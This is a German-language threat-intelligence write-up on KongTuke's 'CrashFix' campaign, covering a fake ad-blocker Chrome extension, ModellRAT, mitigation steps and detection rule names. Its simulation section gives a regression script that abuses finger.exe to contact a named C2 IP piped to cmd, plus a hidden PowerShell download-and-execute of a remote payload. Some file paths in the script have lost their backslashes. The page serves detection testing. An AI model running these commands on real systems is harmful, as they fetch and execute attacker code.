Analyse von CrashFix: KongTukes neues Spielzeug
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
KongTuke verteilte eine bösartige Chrome-Erweiterung namens NexShield, die uBlock Origin Lite nachahmt. Nach der Installation zeigt sie eine “CrashFix”-Sicherheitswarnung an, um einen legitimen Browser-Sicherheitsvorfall zu simulieren, bringt den Browser zum Absturz und zwingt den Benutzer, einen bösartigen PowerShell-Befehl auszuführen, der in die Zwischenablage kopiert wurde. Die Kampagne setzt ein Python-RAT, ModellRAT, auf systemgebundenen Domänen und eine mehrstufige PowerShell-Kette auf eigenständigen Hosts ein.
Untersuchung
Analysten von Huntress überprüften den Code der Erweiterung, verknüpften Command-and-Control mit nexsnield.com und übertrugen die Payloads zurück. Sie beobachteten den Missbrauch von finger.exe als LOLBin, um Anweisungen des Angreifers abzurufen, sowie einen DGA, der .top-Domains generiert. Für Domänenumgebungen identifizierten die Forscher ein mit RC4 verschlüsseltes Python-Implantat, das über den HKCU Run-Schlüssel persistiert. Weitere Taktiken umfassten Anti-Analyse-Checks, AMSI-Umgehungen, und Taktiken der Ressourcenerschöpfung, um Benutzer unter Druck zu setzen, umgehend voll Compliance zu zeigen.
Abschwächung
Blockieren Sie die Chrome-Erweiterungs-ID und überwachen Sie unbekannte Erweiterungen, die beliebte Werbeblocker nachahmen. Erkennen Sie Beaconing zu nexsnield.com, den C2-IPs und DGA-erzeugten Domains. Wenden Sie Ausführungskontrollen an, um LOLBin-Nutzung (einschließlich finger.exe) zu beschränken, und alarmieren Sie bei verdächtigen Run-Schlüsselwerten, insbesondere bei Namen, die weit verbreiteter Software ähneln.
Reaktion
Alarmieren Sie bei NexShield-bezogenen Erweiterungsinstallationen und korrelieren Sie mit ausgehenden Verbindungen zur identifizierten C2- und DGA-Infrastruktur. Isolieren Sie betroffene Hosts und sammeln Sie Erweiterungsartefakte, Registry-Runschlüssel, geplante Aufgaben und abgelegte Dateien. Entfernen Sie die ModellRAT-Persistenz, beseitigen Sie PowerShell-Stufenkomponenten und sanieren Sie den Endpunkt und überprüfen Sie die Validität.
Angriffsfluss
Erkennungen
Rufe verdächtige .NET-Methoden von Powershell aus (über powershell) an
Anzeigen
Verdächtige CURL-Nutzung (über cmdline)
Anzeigen
Kurzer Dateiname (über cmdline)
Anzeigen
Mögliche manuelle oder skriptbasierte Operationen wurden in ungewöhnlichen Ordnern durchgeführt (über cmdline)
Anzeigen
Verdächtige PowerShell-Strings (über powershell)
Anzeigen
Rufe verdächtige Windows-API-Funktionen von Powershell aus (über powershell) an
Anzeigen
Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (über registry_event)
Anzeigen
Ein Archiv wurde in verdächtiges Verzeichnis mit PowerShell extrahiert (über powershell)
Anzeigen
Python-Ausführung aus verdächtigen Ordnern (über cmdline)
Anzeigen
Mögliche Indikatoren für PowerShell-Verschleierung (über powershell)
Anzeigen
Mögliche Systemabfragen (über cmdline)
Anzeigen
Download oder Upload über PowerShell (über cmdline)
Anzeigen
IOCs (SourceIP) zum Erkennen: Dissecting CrashFix: KongTukes neues Werkzeug
Anzeigen
IOCs (HashSha256) zum Erkennen: Dissecting CrashFix: KongTukes neues Werkzeug
Anzeigen
IOCs (DestinationIP) zum Erkennen: Dissecting CrashFix: KongTukes neues Werkzeug
Anzeigen
IOCs (E-Mails) zum Erkennen: Dissecting CrashFix: KongTukes neues Werkzeug
Anzeigen
KongTuke CrashFix bösartigen Befehlsausführung erkennen [Windows Process Creation]
Anzeigen
Erkennung von AMSI-Umgehung und Beweismittelentfernung über PowerShell [Windows PowerShell]
Anzeigen
Simulation Execution
Voraussetzung: Das Telemetrie- und Basislinien-Vorflug-Check muss bestanden haben.
Rationale: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die von der Erkennungslogik erwartete Telemetrie zu erzeugen.
-
Angriffs-Narrativ und Befehle:
Der Angreifer kopiert zunächst das legitimefinger.exeBinary in das temporäre Verzeichnis, benennt es inct.exeum, und verwendet dann eine verschachteltecmd /cKette, um das kopierte Binary mit einem manipulierten Argument auszuführen, das einen Remote-C2-Server kontaktiert (199.217.98.108). Das Binary streamt das Payload zurück in die Befehlszeile, die dann in eine zweite verstecktecmddie den empfangenen Code ausführt, weitergeleitet wird. Danach nutzt der Angreifer PowerShell, um ein sekundäres Payload überInvoke-WebRequestherunterzuladen und führt es sofort mitiexaus. Alle Schritte erfolgen mit minimaler Benutzeroberfläche (/min), um eine Benutzerdetektion zu vermeiden.1. Kopiere finger.exe → %TEMP%ct.exe 2. Führe aus: cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd" 3. PowerShell Download & Ausführung des sekundären Payloads: powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri 'http://199.217.98.108/payload.ps1' -UseBasicParsing).Content" -
Regressionstest-Skript: Das untenstehende Skript reproduziert die gesamte Angriffskette auf einer Windows-Testmaschine. Führen Sie es in einer erhöhten PowerShell-Sitzung aus.
#------------------------------------------------- # KongTuke CrashFix bösartigen Befehlsausführung #------------------------------------------------- # 1. Verteile den LOLBin (finger.exe) in %TEMP% als ct.exe $fingerPath = "$env:windirsystem32finger.exe" $tempExe = "$env:TEMPct.exe" Copy-Item -Path $fingerPath -Destination $tempExe -Force # 2. Führe die bösartige cmd-Kette aus (übereinstimmend mit Sigma-Regel) $maliciousCmd = 'cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"' Start-Process -FilePath "cmd.exe" -ArgumentList "/c $maliciousCmd" -WindowStyle Hidden # 3. PowerShell Web-Download-Ausführung des sekundären Payloads $payloadUrl = 'http://199.217.98.108/payload.ps1' $psCommand = "iex (Invoke-WebRequest -Uri `'$payloadUrl`' -UseBasicParsing).Content" Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `$psCommand`" -WindowStyle Hidden #------------------------------------------------- -
Bereinigungskommandos: Entfernen Sie Artefakte und beenden Sie alle verbleibenden Prozesse, die durch den Test erstellt wurden.
# Lösche die kopierte ct.exe Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue # Beenden Sie alle umherstreifenden cmd.exe- oder powershell.exe-Prozesse, die vom Test gestartet wurden (nach bestimmten Befehlszeilen filtern) Get-WmiObject Win32_Process | Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } | ForEach-Object { $_.Terminate() } # Optional: Event-Log löschen, falls für Wiederholbarkeit erforderlich # wevlutil cl Security